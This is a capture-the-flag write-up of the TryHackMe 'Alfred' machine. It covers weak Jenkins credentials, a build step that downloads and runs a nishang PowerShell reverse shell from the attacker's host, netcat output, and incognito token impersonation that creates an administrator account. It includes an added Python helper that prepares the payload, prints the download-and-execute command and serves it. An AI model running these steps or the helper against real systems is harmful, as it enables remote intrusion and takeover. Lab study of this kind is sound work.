
Alfred Writeup [THM]

Alfred is a Windows machine from TryHackMe. It consists of exploiting a Jenkins server that accepts weak credentials to obtain a shell, and then abusing Windows access tokens (token impersonation) to escalate privileges.

Enumeration

Running nmap:

  nmap -sC -sV -Pn -oN nmap.txt 10.10.151.159
  Nmap scan report for 10.10.151.159
  Host is up (0.045s latency).
  Not shown: 997 filtered ports
  PORT     STATE SERVICE    VERSION
  80/tcp   open  http       Microsoft IIS httpd 7.5
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/7.5
  |_http-title: Site doesn't have a title (text/html).
  3389/tcp open  tcpwrapped
  |_ssl-date: 2020-07-28T14:15:55+00:00; -3s from scanner time.
  8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
  | http-robots.txt: 1 disallowed entry
  |_/
  |_http-server-header: Jetty(9.4.z-SNAPSHOT)
  |_http-title: Site doesn't have a title (text/html;charset=utf-8).
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating port 80, we find the following landing page; there is nothing interesting on it:

[Image: Web]

Exploitation

Next we focus on port 8080, which hosts a Jenkins server. It accepts the weak credentials admin:jenkins. Once logged in, we find that a project has already been created. Browsing to http://10.10.151.159:8080/job/project/configure lets us edit its configuration; scrolling down to the Build section we see that we can add an "Execute Windows batch command" build step. Whatever we put there runs on the server, under the account the Jenkins service runs as, every time the job is built, which lets us download and trigger a reverse shell.

First we set up a web server with Python to host the payload:

  python -m SimpleHTTPServer 80

In this case we will use PowerShell to download it, and the PowerShell reverse shell from nishang: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 (that is the GitHub page; when fetching it with curl or wget use the Raw link, https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1, otherwise you get GitHub's HTML instead of the script).

It is important to add the following line at the end of the PowerShell script: the file only defines the Invoke-PowerShellTcp function, so without this call nothing connects back when the script is downloaded and executed in memory (10.11.14.106 is the attacker's IP):

  Invoke-PowerShellTcp -Reverse -IPAddress 10.11.14.106 -Port 4444

[Image: shell]

Then we save the configuration, start a netcat listener, go back to the project page and click Build Now.

[Image: build]

Checking netcat, we receive a reverse connection as the user bruce (ALFRED is the hostname; bruce is the account the Jenkins service runs as):

nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.151.159] 49198
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce
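As an added example (not code from the original post, nor part of nishang), here is an attacker-side Python 3 helper that performs the preparation steps above in one go: it appends the invocation line to the nishang script, refuses an input that does not actually define Invoke-PowerShellTcp (what you get when the /blob/ page is fetched instead of the raw file), prints the command for the Jenkins build step, and serves the current directory on port 80 (the Python 3 equivalent of the SimpleHTTPServer command above). The page only shows the build-step command in a screenshot, so the download-and-IEX form produced by jenkins_build_step() is an assumption; SAMPLE_NISHANG is a constructed stand-in for the real script, used only to exercise the functions.

```python
"""Attacker-side helper for the Jenkins build-step reverse shell.

Added example for this writeup; not part of the original post or of nishang.
"""
import pathlib
import re
import sys

# Constructed stand-in for the real Invoke-PowerShellTcp.ps1: only the
# "function" line that build_payload() checks for matters here.
SAMPLE_NISHANG = """function Invoke-PowerShellTcp
{
    # ... body of the real nishang function ...
}
"""


def build_payload(script: str, lhost: str, lport: int) -> str:
    """Return the script with the invocation line appended.

    Without this line the download only defines the function and nothing
    connects back. The input is rejected if it does not define
    Invoke-PowerShellTcp, which is what happens when the GitHub /blob/
    page is fetched instead of the raw file.
    """
    if not re.search(r"^function\s+Invoke-PowerShellTcp\b", script, re.MULTILINE):
        raise ValueError("input does not define Invoke-PowerShellTcp; fetch the raw .ps1")
    invoke = f"Invoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport}"
    if invoke in script:
        return script  # already prepared; do not append a second call
    return script.rstrip("\r\n") + "\n" + invoke + "\n"


def jenkins_build_step(lhost: str, http_port: int = 80,
                       name: str = "Invoke-PowerShellTcp.ps1") -> str:
    """Command for the 'Execute Windows batch command' build step.

    Assumed form (the page only shows it in a screenshot): fetch the script
    into memory and run it with IEX, so nothing is written to disk on the
    target; the appended invocation line then opens the shell.
    """
    url = f"http://{lhost}:{http_port}/{name}"
    return ('powershell -nop -ep bypass -c '
            f'"IEX (New-Object Net.WebClient).DownloadString(\'{url}\')"')


if __name__ == "__main__":
    # usage: python3 prep.py <LHOST> <LPORT>  (run from the dir holding the raw .ps1)
    lhost, lport = sys.argv[1], int(sys.argv[2])
    ps1 = pathlib.Path("Invoke-PowerShellTcp.ps1")
    ps1.write_text(build_payload(ps1.read_text(), lhost, lport))
    print("Jenkins build step:\n ", jenkins_build_step(lhost))
    print(f"Listener:\n  nc -lvnp {lport}")
    # Serve the current directory on port 80 (needs root); Python 3
    # equivalent of `python -m SimpleHTTPServer 80`.
    from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
    ThreadingHTTPServer(("0.0.0.0", 80), SimpleHTTPRequestHandler).serve_forever()
```

Run it from the directory containing the raw Invoke-PowerShellTcp.ps1, paste the printed build step into the Jenkins job, start the listener it prints, and click Build Now.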

Privilege Escalation

We check which privileges the user bruce has enabled:

PS C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
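As an added example (not from the original post), a small Python 3 triage script that parses the output of whoami /priv and flags the privileges that typically allow token abuse or file-level privilege escalation. SAMPLE is constructed from the output above plus two made-up lines (one disabled risky privilege, one harmless one) to exercise the check; the privilege-to-technique mapping in RISKY_PRIVS is general knowledge, not something the page states. One caveat the output does not make obvious: a privilege shown as Disabled is still held by the token, because the process can enable it with AdjustTokenPrivileges (tools such as incognito do this themselves), so the check reports held privileges in either state.

```python
"""Triage of `whoami /priv` output.

Added example for this writeup, not part of the original post. The mapping
of privileges to abuse techniques is general knowledge, not from the page.
"""
import re

# Privileges worth flagging when they appear in a token. "Disabled" only
# means not currently enabled: the process can turn it on itself, so the
# state is reported but does not exclude the privilege.
RISKY_PRIVS = {
    "SeImpersonatePrivilege": "impersonate other tokens (incognito, potato family)",
    "SeAssignPrimaryTokenPrivilege": "start processes under another token",
    "SeDebugPrivilege": "open any process and duplicate its token",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# Constructed sample: the three lines from the output above plus two made-up
# lines (a disabled risky privilege and a harmless one).
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeBackupPrivilege               Back up files and directories             Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
"""

# name, free-text description, state; header and separator lines do not match.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_privs(text: str) -> dict:
    """Map each privilege name to (description, state)."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if m:
            privs[m.group(1)] = (m.group(2), m.group(3))
    return privs


def abusable(text: str) -> list:
    """Sorted (name, state, why) for every held privilege listed in RISKY_PRIVS."""
    return sorted(
        (name, state, RISKY_PRIVS[name])
        for name, (_desc, state) in parse_privs(text).items()
        if name in RISKY_PRIVS
    )


if __name__ == "__main__":
    for name, state, why in abusable(SAMPLE):
        print(f"{name:32} {state:9} {why}")
```

Paste the real whoami /priv output in place of SAMPLE, or pipe it in from the shell, to see which privileges point at which technique before choosing a tool.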

We will exploit SeImpersonatePrivilege and SeDebugPrivilege with the help of incognito: https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip. SeDebugPrivilege lets our process open other processes regardless of their ACLs, and SeImpersonatePrivilege lets it impersonate the tokens it finds there; incognito enumerates the tokens reachable this way and uses one with enough rights for the requested action. Note its warning below: when not running as SYSTEM, not every token on the box is visible to it.

Transferring the .exe with Impacket's smbserver.py, run from the directory containing incognito.exe (the share is exported without authentication, so do this only on a lab network):

smbserver.py smbfolder .

On the victim machine, copying it into C:\windows\temp, where we run it from next:

copy \\10.11.14.106\smbfolder\incognito.exe C:\windows\temp\

Now with incognito we can simply create a user and add it to the local Administrators group:

PS C:\windows\temp> ./incognito.exe add_user writeup I_hope_you_like_it
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to host 127.0.0.1
[+] Successfully added user
PS C:\windows\temp> ./incognito.exe add_localgroup_user Administrators writeup
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group

As port 3389 (RDP) was open, we can log in with the new administrator account through rdesktop:

rdesktop -g 90% -u writeup -p I_hope_you_like_it 10.10.151.159

[Image: privesc]

This post is licensed under CC BY 4.0 by the author.